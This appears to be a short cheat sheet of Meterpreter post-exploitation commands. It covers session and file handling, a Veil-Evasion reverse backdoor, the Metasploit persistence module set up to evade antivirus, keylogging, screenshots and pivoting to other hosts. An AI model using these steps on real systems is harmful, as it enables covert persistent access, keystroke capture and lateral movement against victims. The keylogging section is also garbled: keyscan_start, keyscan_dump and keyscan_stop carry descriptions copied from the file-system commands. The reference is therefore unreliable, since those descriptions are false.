Post Exploitation¶
Meterpreter Basics¶
help - shows help
background - backgrounds current session
sessions -l - list all sessions
sessions -i - interact with a certain session
sysinfo - display system info
ipconfig - displays infor about interfaces
getuid - shows current user
File System Commands¶
pwd - shows current working directory
ls - list files in current working directory
cd [location] - changes working directory
cat [file] - prints the content of file on screen
download [file] - downloads file
upload [file] - uploads file
execute -f [file] - executes file
Maintaining Access¶
Using a veil-evasion
rev_http_service
rev_tcp_service
Use it instead of a normal backdoor
Or upload and execute from meterpreter
Does not always work
Using persistence module
run persistence -h
Detectable by antivirus programs
Using metasploit + veil-evasion = more rubust + undetectable by antivirus
use exploit/windows/local/persistence
set session [session id]
set exe::custom [backdoor location]
exploit
Key Logging¶
Log all mouse/keyboard events
keyscan_start - shows current working directory
keyscan_dump - lists files in the current working directory
keyscan_stop - changes working directory to location
screenshot
Pivoting¶
Use the hacked device as a pivot
Try to gain access to other devices in the network